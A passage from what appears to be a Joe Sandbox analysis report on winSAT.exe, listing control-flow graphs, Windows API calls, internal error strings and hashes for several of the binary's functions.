1540 7ff780fdca44-7ff780fdca51 1539->1540 1541 7ff780fdca53-7ff780fdca85 call 7ff780fdc470 _CxxThrowException 1539->1541 1541->1538 1550 7ff780fdcc20-7ff780fdcc4e GetLastError call 7ff780f93230 _CxxThrowException 1548->1550 1549->1550 1551 7ff780fdcb47-7ff780fdcb5c LockResource 1549->1551 1553 7ff780fdcc4f-7ff780fdcc7d GetLastError call 7ff780f93230 _CxxThrowException 1550->1553 1551->1553 1554 7ff780fdcb62-7ff780fdcb77 SizeofResource 1551->1554 1558 7ff780fdcc7e-7ff780fdccac GetLastError call 7ff780f93230 _CxxThrowException 1553->1558 1554->1558 1559 7ff780fdcb7d-7ff780fdcb87 1554->1559 1567 7ff780fdccad-7ff780fdcce3 GetLastError call 7ff780f93230 _CxxThrowException 1558->1567 1563 7ff780fdcb8b-7ff780fdcb8d 1559->1563 1565 7ff780fdcb8f-7ff780fdcba0 1563->1565 1566 7ff780fdcba8-7ff780fdcbac 1563->1566 1565->1567 1568 7ff780fdcba6 1565->1568 1569 7ff780fdcce4-7ff780fdcd12 GetLastError call 7ff780f93230 _CxxThrowException 1566->1569 1570 7ff780fdcbb2-7ff780fdcbba 1566->1570 1567->1569 1568->1563 1572 7ff780fdcd13-7ff780fdcd5b call 7ff780f93264 _CxxThrowException 1569->1572 1570->1572 1573 7ff780fdcbc0-7ff780fdcbef 1570->1573 1579 7ff780fdcd8d-7ff780fdcdaf call 7ff780f93264 _CxxThrowException 1572->1579 1580 7ff780fdcd5d-7ff780fdcd61 1572->1580 1581 7ff780fdcd63-7ff780fdcd77 memmove 1580->1581 1582 7ff780fdcd79 1580->1582 1584 7ff780fdcd7b-7ff780fdcd87 1581->1584 1582->1584 1584->1579
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CriticalResourceSection$EnterLeaveModule$ErrorFileFindHandleLastLoadLockNameSizeofvswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h$cannot find the resource$cannot get the resource size$cannot load the resource's size$cannot lock the resource in memory$canot laod string$resource string is zero zero length (invalid)$string reosurce is not null terminated$target string too small to load resource
                                                                                                                                                                                              • API String ID: 85048269-1477483317
                                                                                                                                                                                              • Opcode ID: 3c43ff0e69830a3088900ec575c8129855818ac5b2b2950fe7362f372c14f77e
                                                                                                                                                                                              • Instruction ID: 80473cec346462881a99975a872c29042306b15627fe62931ca56429ea073b3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c43ff0e69830a3088900ec575c8129855818ac5b2b2950fe7362f372c14f77e
                                                                                                                                                                                              • Instruction Fuzzy Hash: B202A066A18A5786EB00EB11E8144BDF761FB89B84FE48031DE4E43BA4DF7CE546C760
                                                                                                                                                                                              Function 00007FF780F9F417 Relevance: 77.3, APIs: 38, Strings: 6, Instructions: 316synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1586 7ff780f9f417-7ff780f9f44c call 7ff780f9a41c call 7ff780fce3ac 1592 7ff780fa07e2-7ff780fa080d _CxxThrowException * 2 1586->1592 1593 7ff780f9f452-7ff780fa04bc call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac call 7ff780fcf3b4 1586->1593 1596 7ff780fa0812-7ff780fa0af0 _CxxThrowException * 27 1592->1596 1619 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 1593->1619 1620 7ff780fa04be-7ff780fa04c8 1593->1620 1611 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1596->1611 1613 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1611->1613 1615 7ff780fa0b51-7ff780fa0b56 1613->1615 1616 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1613->1616 1616->1615 1625 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1619->1625 1626 7ff780fa0583-7ff780fa058a 1619->1626 1620->1611 1622 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1620->1622 1622->1619 1629 7ff780fa04d7-7ff780fa04de 1622->1629 1625->1613 1639 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1625->1639 1630 7ff780fa0591-7ff780fa0598 1626->1630 1631 7ff780fa058c call 7ff780f9a698 1626->1631 1629->1619 1635 7ff780fa04e0-7ff780fa04e7 1629->1635 1632 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1630->1632 1633 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1630->1633 1631->1630 1648 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 1632->1648 1649 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1632->1649 1633->1632 1635->1619 1640 7ff780fa04e9-7ff780fa04f0 1635->1640 1639->1626 1640->1619 1644 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1640->1644 1644->1619 1655 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1644->1655 1652 7ff780fa05e6-7ff780fa05ed 1648->1652 1653 7ff780fa0635-7ff780fa063a 1648->1653 1649->1648 1652->1653 1658 7ff780fa05ef-7ff780fa05f9 1652->1658 1656 7ff780fa0665-7ff780fa066f 1653->1656 1657 7ff780fa063c-7ff780fa0643 1653->1657 1655->1619 1663 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1656->1663 1664 7ff780fa0697-7ff780fa069e 1656->1664 1661 7ff780fa0645-7ff780fa064f 1657->1661 1662 7ff780fa065e 1657->1662 1658->1653 1665 7ff780fa05fb-7ff780fa061a 1658->1665 1661->1662 1666 7ff780fa0651 1661->1666 1662->1656 1663->1664 1667 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1664->1667 1668 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 1664->1668 1665->1653 1673 7ff780fa061c-7ff780fa0628 1665->1673 1666->1662 1667->1668 1668->1596 1673->1653
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CloseResource$OpenValue$CriticalEnabledEventHandleSection__uncaught_exception$ConsoleCountCtrlCurrentDirectoryEnterErrorFileFindFreeHandlerLastLeaveLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitializeWrite_snprintf_s_time64_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run a formal assessment via a remote session$ERROR: no multi-media files during moobe, no MM support - just running the DWM assessment.$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 1593046435-1291908742
                                                                                                                                                                                              • Opcode ID: f30cb8376c036b7314b2b6be6d4124e2b77f6d3b6334824af8bcb3c544496fa4
                                                                                                                                                                                              • Instruction ID: e38654631a438b41640397e93570c8289a2c698c03659b5190cfac5d38a615f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: f30cb8376c036b7314b2b6be6d4124e2b77f6d3b6334824af8bcb3c544496fa4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF130A2E0D68795EB20FB15F8502F9B761FF81344FF09035C58E466A9DEACE548CB20
                                                                                                                                                                                              Function 00007FF780F9F4AE Relevance: 75.6, APIs: 37, Strings: 6, Instructions: 334synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1685 7ff780f9f4ae-7ff780f9f4b5 1686 7ff780f9f528-7ff780f9f52f 1685->1686 1687 7ff780f9f4b7-7ff780f9f4be 1685->1687 1688 7ff780f9f5a2-7ff780f9f5c3 CreateEventW 1686->1688 1689 7ff780f9f531-7ff780f9f538 1686->1689 1687->1686 1690 7ff780f9f4c0-7ff780f9f4ca 1687->1690 1691 7ff780f9f603-7ff780f9f614 ResetEvent 1688->1691 1692 7ff780f9f5c5-7ff780f9f5fc GetLastError call 7ff780fa96e0 call 7ff780fce3ac 1688->1692 1689->1688 1693 7ff780f9f53a-7ff780f9f544 1689->1693 1694 7ff780f9f4d0-7ff780f9f523 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 1690->1694 1695 7ff780fa07f7-7ff780fa080d _CxxThrowException 1690->1695 1699 7ff780f9f692-7ff780f9f6aa SetConsoleCtrlHandler 1691->1699 1700 7ff780f9f616-7ff780f9f63b GetLastError call 7ff780fa9820 1691->1700 1692->1691 1697 7ff780fa0812-7ff780fa0828 _CxxThrowException 1693->1697 1698 7ff780f9f54a-7ff780f9f59d call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 1693->1698 1694->1686 1772 7ff780fa04a4-7ff780fa04bc call 7ff780fcf3b4 1694->1772 1695->1697 1702 7ff780fa082d-7ff780fa0843 _CxxThrowException 1697->1702 1698->1772 1704 7ff780f9f705-7ff780f9f70f 1699->1704 1705 7ff780f9f6ac-7ff780f9f6b6 1699->1705 1700->1702 1724 7ff780f9f641-7ff780f9f68d call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 1700->1724 1711 7ff780fa0848-7ff780fa085e _CxxThrowException 1702->1711 1709 7ff780f9f711-7ff780f9f730 ReleaseMutex CloseHandle 1704->1709 1710 7ff780f9f737-7ff780f9f764 CreateMutexW GetLastError 1704->1710 1705->1711 1713 7ff780f9f6bc-7ff780f9f700 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 1705->1713 1709->1710 1718 7ff780f9f81a-7ff780f9f821 1710->1718 1719 7ff780f9f76a-7ff780f9f77b GetLastError 1710->1719 1720 7ff780fa0863-7ff780fa0879 _CxxThrowException 1711->1720 1713->1704 1729 7ff780f9f823-7ff780f9f82a 1718->1729 1730 7ff780f9f83d-7ff780f9f856 call 7ff780fd5178 1718->1730 1726 7ff780f9f781-7ff780f9f7a6 GetLastError call 7ff780fa9820 1719->1726 1727 7ff780f9f8b9-7ff780f9f8c3 1719->1727 1728 7ff780fa087e-7ff780fa0af0 _CxxThrowException * 23 1720->1728 1724->1699 1726->1720 1758 7ff780f9f7ac-7ff780f9f815 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780f92e8c call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 1726->1758 1727->1728 1734 7ff780f9f8c9-7ff780f9f91c call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 1727->1734 1759 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1728->1759 1738 7ff780f9f830-7ff780f9f837 1729->1738 1739 7ff780f9f9aa-7ff780f9f9e6 call 7ff780f9d0d4 1729->1739 1730->1772 1734->1772 1738->1730 1750 7ff780f9f984-7ff780f9f98b 1738->1750 1777 7ff780f9fa18 1739->1777 1778 7ff780f9f9e8-7ff780f9f9f3 1739->1778 1750->1739 1760 7ff780f9f98d-7ff780f9f994 1750->1760 1758->1718 1770 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1759->1770 1760->1739 1771 7ff780f9f996-7ff780f9f9a5 call 7ff780fce3ac 1760->1771 1783 7ff780fa0b51-7ff780fa0b56 1770->1783 1784 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1770->1784 1771->1739 1795 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 1772->1795 1796 7ff780fa04be-7ff780fa04c8 1772->1796 1777->1772 1789 7ff780f9fa0f-7ff780f9fa17 call 7ff7810a458c 1778->1789 1790 7ff780f9f9f5-7ff780f9fa05 call 7ff780fa7e24 1778->1790 1784->1783 1789->1777 1812 7ff780f9fa07 1790->1812 1815 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1795->1815 1816 7ff780fa0583-7ff780fa058a 1795->1816 1796->1759 1803 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1796->1803 1803->1795 1821 7ff780fa04d7-7ff780fa04de 1803->1821 1812->1789 1815->1770 1834 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1815->1834 1823 7ff780fa0591-7ff780fa0598 1816->1823 1824 7ff780fa058c call 7ff780f9a698 1816->1824 1821->1795 1829 7ff780fa04e0-7ff780fa04e7 1821->1829 1825 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1823->1825 1826 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1823->1826 1824->1823 1845 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 1825->1845 1846 7ff780fa05bc-7ff780fa05c3 CoUninitialize 1825->1846 1826->1825 1829->1795 1835 7ff780fa04e9-7ff780fa04f0 1829->1835 1834->1816 1835->1795 1840 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 1835->1840 1840->1795 1853 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 1840->1853 1850 7ff780fa05e6-7ff780fa05ed 1845->1850 1851 7ff780fa0635-7ff780fa063a 1845->1851 1846->1845 1850->1851 1856 7ff780fa05ef-7ff780fa05f9 1850->1856 1854 7ff780fa0665-7ff780fa066f 1851->1854 1855 7ff780fa063c-7ff780fa0643 1851->1855 1853->1795 1861 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 1854->1861 1862 7ff780fa0697-7ff780fa069e 1854->1862 1859 7ff780fa0645-7ff780fa064f 1855->1859 1860 7ff780fa065e 1855->1860 1856->1851 1863 7ff780fa05fb-7ff780fa061a 1856->1863 1859->1860 1864 7ff780fa0651 1859->1864 1860->1854 1861->1862 1865 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 1862->1865 1866 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 1862->1866 1863->1851 1871 7ff780fa061c-7ff780fa0628 1863->1871 1864->1860 1865->1866 1866->1697 1871->1851
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLast$EventResource$ConsoleCreateCtrlEnabledHandleHandlerMutex__uncaught_exception$CloseCountCurrentDirectoryFindLoadLockModuleProcessReleaseRemoveResetSizeofTickUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: User required this run be on bateries, but the machine is not currently on batteries.$ERROR: can't run a formal assessment on batteries$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 1955473893-3736981142
                                                                                                                                                                                              • Opcode ID: 4be07b2bb223d74f9d019a6ea4b05025570757569afd096574fae95daf19b5c9
                                                                                                                                                                                              • Instruction ID: 0b64cacebee4f622cc6b4f4361c2d171180b459733b960ba39f2c8fbddc88b84
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4be07b2bb223d74f9d019a6ea4b05025570757569afd096574fae95daf19b5c9
                                                                                                                                                                                              • Instruction Fuzzy Hash: C60250A1E0D68795EB20FB15F8502F9E761FF81344FF49035C58E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780FAE868 Relevance: 59.8, APIs: 25, Strings: 9, Instructions: 265COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1883 7ff780fae868-7ff780fae88f 1884 7ff780fae895-7ff780fae8b0 GetFileVersionInfoSizeExW 1883->1884 1885 7ff780faeb87-7ff780faeb9b _CxxThrowException 1883->1885 1886 7ff780fae8b2-7ff780fae8bc 1884->1886 1887 7ff780fae8fc-7ff780fae911 call 7ff7810a5e38 1884->1887 1888 7ff780faeb9c-7ff780faebb0 _CxxThrowException 1885->1888 1886->1888 1889 7ff780fae8c2-7ff780fae8f7 GetLastError call 7ff780fce694 1886->1889 1897 7ff780faeb83-7ff780faeb85 1887->1897 1898 7ff780fae917-7ff780fae921 1887->1898 1891 7ff780faebb1-7ff780faebc5 _CxxThrowException 1888->1891 1902 7ff780faeb70-7ff780faeb72 1889->1902 1894 7ff780faebc6-7ff780faebda _CxxThrowException 1891->1894 1895 7ff780faebdb-7ff780faebef _CxxThrowException 1894->1895 1901 7ff780faebf0-7ff780faec04 _CxxThrowException 1895->1901 1903 7ff780faeb77-7ff780faeb81 1897->1903 1899 7ff780fae927-7ff780fae945 GetFileVersionInfoW 1898->1899 1900 7ff780faecad-7ff780faecc1 _CxxThrowException 1898->1900 1904 7ff780fae991-7ff780fae9b1 VerQueryValueW 1899->1904 1905 7ff780fae947-7ff780fae951 1899->1905 1906 7ff780faec05-7ff780faec19 _CxxThrowException 1901->1906 1902->1897 1907 7ff780faeb74 1902->1907 1910 7ff780fae9b3-7ff780fae9bd 1904->1910 1911 7ff780fae9e4-7ff780fae9f9 1904->1911 1905->1891 1908 7ff780fae957-7ff780fae971 GetLastError 1905->1908 1909 7ff780faec1a-7ff780faec2e _CxxThrowException 1906->1909 1907->1903 1912 7ff780fae976-7ff780fae98c call 7ff780fce694 1908->1912 1913 7ff780faec2f-7ff780faec43 _CxxThrowException 1909->1913 1910->1894 1914 7ff780fae9c3-7ff780fae9e2 GetLastError 1910->1914 1915 7ff780fae9ff-7ff780faea13 call 7ff780fa86a4 1911->1915 1916 7ff780faec98-7ff780faecac _CxxThrowException 1911->1916 1923 7ff780faeb68-7ff780faeb6b call 7ff7810a458c 1912->1923 1918 7ff780faec44-7ff780faec58 _CxxThrowException 1913->1918 1914->1912 1925 7ff780faec83-7ff780faec97 _CxxThrowException 1915->1925 1926 7ff780faea19-7ff780faea35 call 7ff780fa8b64 1915->1926 1916->1900 1921 7ff780faec59-7ff780faec6d _CxxThrowException 1918->1921 1924 7ff780faec6e-7ff780faec82 _CxxThrowException 1921->1924 1923->1902 1924->1925 1925->1916 1926->1924 1930 7ff780faea3b-7ff780faea5b VerQueryValueW 1926->1930 1931 7ff780faea91-7ff780faea9b 1930->1931 1932 7ff780faea5d-7ff780faea67 1930->1932 1931->1921 1934 7ff780faeaa1-7ff780faeab4 call 7ff780faacb8 1931->1934 1932->1895 1933 7ff780faea6d-7ff780faea87 GetLastError 1932->1933 1933->1931 1934->1918 1937 7ff780faeaba-7ff780faeace call 7ff780fa86a4 1934->1937 1937->1913 1940 7ff780faead4-7ff780faeaf0 call 7ff780fa8b64 1937->1940 1940->1909 1943 7ff780faeaf6-7ff780faeb16 VerQueryValueW 1940->1943 1944 7ff780faeb18-7ff780faeb22 1943->1944 1945 7ff780faeb4c-7ff780faeb56 1943->1945 1944->1901 1946 7ff780faeb28-7ff780faeb42 GetLastError 1944->1946 1945->1906 1947 7ff780faeb5c-7ff780faeb65 call 7ff780faacb8 1945->1947 1946->1945 1947->1923
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorFileInfoLastVersion$Size
                                                                                                                                                                                              • String ID: \StringFileInfo\%04X%04X\FileDescription$\StringFileInfo\%04X%04X\InternalName$\VarFileInfo\Translation$base\winsat\exe\app.cpp$cannot find the version information in %s$cannot get application description from %s$cannot get the applicatno title from %s$cannot load the version information from %s$version infomratino not found in %s
                                                                                                                                                                                              • API String ID: 1970463299-574011123
                                                                                                                                                                                              • Opcode ID: daacf999211bac3c3cbd8e9461f84228cf19f7903a7e38890608c88c3565f534
                                                                                                                                                                                              • Instruction ID: c33b1ff76f8d4c04587c0d80ff14a65296dbbb303f5711b59da202bf32aee734
                                                                                                                                                                                              • Opcode Fuzzy Hash: daacf999211bac3c3cbd8e9461f84228cf19f7903a7e38890608c88c3565f534
                                                                                                                                                                                              • Instruction Fuzzy Hash: EDC13D66A09A47C6EB14BF16E8501B8B760FF85B98BF09035DA0E137A5DF7DE904C720
                                                                                                                                                                                              Function 00007FF780FAC91C Relevance: 58.2, APIs: 26, Strings: 7, Instructions: 443COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1950 7ff780fac91c-7ff780fac93f 1951 7ff780fac945-7ff780fac959 call 7ff780fa8410 1950->1951 1952 7ff780facef3-7ff780facf07 _CxxThrowException 1950->1952 1957 7ff780fac968-7ff780fac98a GetModuleFileNameW 1951->1957 1958 7ff780fac95b-7ff780fac965 call 7ff780fa86a4 1951->1958 1954 7ff780facf08-7ff780facf1c _CxxThrowException 1952->1954 1956 7ff780facf1d-7ff780facf31 _CxxThrowException 1954->1956 1959 7ff780facf32-7ff780facf46 _CxxThrowException 1956->1959 1962 7ff780fac9bc-7ff780fac9bf 1957->1962 1963 7ff780fac98c-7ff780fac9ba call 7ff780fa8810 GetModuleFileNameW 1957->1963 1958->1957 1961 7ff780facf47-7ff780facf5b _CxxThrowException 1959->1961 1967 7ff780facf5c-7ff780facf70 _CxxThrowException 1961->1967 1964 7ff780fac9c1-7ff780fac9e5 GetLastError call 7ff780fa8410 SetLastError 1962->1964 1965 7ff780fac9e7-7ff780fac9f8 call 7ff780fa8810 1962->1965 1963->1962 1976 7ff780fac9fa-7ff780faca5d GetLastError call 7ff780fdc700 SetLastError GetLastError call 7ff780fce694 1964->1976 1965->1976 1977 7ff780faca5f-7ff780faca69 1965->1977 1971 7ff780facf71-7ff780facf85 _CxxThrowException 1967->1971 1975 7ff780facf86-7ff780facf9a _CxxThrowException 1971->1975 1978 7ff780facf9b-7ff780facfaf _CxxThrowException 1975->1978 1980 7ff780faca6f-7ff780faca7e call 7ff780fa8be8 1977->1980 1981 7ff780facede-7ff780facef2 _CxxThrowException 1977->1981 1982 7ff780facfb0-7ff780facfc4 _CxxThrowException 1978->1982 1989 7ff780facfef-7ff780fad003 _CxxThrowException 1980->1989 1990 7ff780faca84-7ff780faca95 call 7ff780faf1d4 1980->1990 1981->1952 1983 7ff780facfc5-7ff780facfd9 _CxxThrowException 1982->1983 1986 7ff780facfda-7ff780facfee _CxxThrowException 1983->1986 1986->1989 1994 7ff780facaa2-7ff780facaa9 1990->1994 1995 7ff780faca97-7ff780faca9d call 7ff780faf1d4 1990->1995 1997 7ff780facaab-7ff780facaba 1994->1997 1998 7ff780facabc-7ff780facac4 1994->1998 1995->1994 1997->1998 1999 7ff780facac6-7ff780facad5 call 7ff780fa8978 1997->1999 2000 7ff780facad9-7ff780facae3 1998->2000 1999->2000 2000->1986 2002 7ff780facae9-7ff780facaef 2000->2002 2004 7ff780facaf1-7ff780facaf6 2002->2004 2005 7ff780facb16-7ff780facb30 call 7ff780fa7e24 2002->2005 2004->2005 2007 7ff780facaf8-7ff780facafe 2004->2007 2005->1983 2012 7ff780facb36-7ff780facb63 call 7ff780fa8be8 call 7ff780fa8010 call 7ff780faf0dc 2005->2012 2007->2005 2009 7ff780facb00-7ff780facb07 2007->2009 2010 7ff780facb09 call 7ff7810a458c 2009->2010 2011 7ff780facb0e-7ff780facb11 call 7ff7810a458c 2009->2011 2010->2011 2011->2005 2021 7ff780facb82-7ff780facb9d call 7ff780fa7e24 2012->2021 2022 7ff780facb65-7ff780facb6a 2012->2022 2021->1982 2030 7ff780facba3-7ff780facbc2 call 7ff780fa25a8 call 7ff780fa7e24 call 7ff780fae868 2021->2030 2022->2021 2024 7ff780facb6c-7ff780facb73 2022->2024 2025 7ff780facb75 call 7ff7810a458c 2024->2025 2026 7ff780facb7a-7ff780facb7d call 7ff7810a458c 2024->2026 2025->2026 2026->2021 2036 7ff780facbc7-7ff780facbc9 2030->2036 2037 7ff780facbe8-7ff780facc17 FindResourceW 2036->2037 2038 7ff780facbcb-7ff780facbde GetLastError 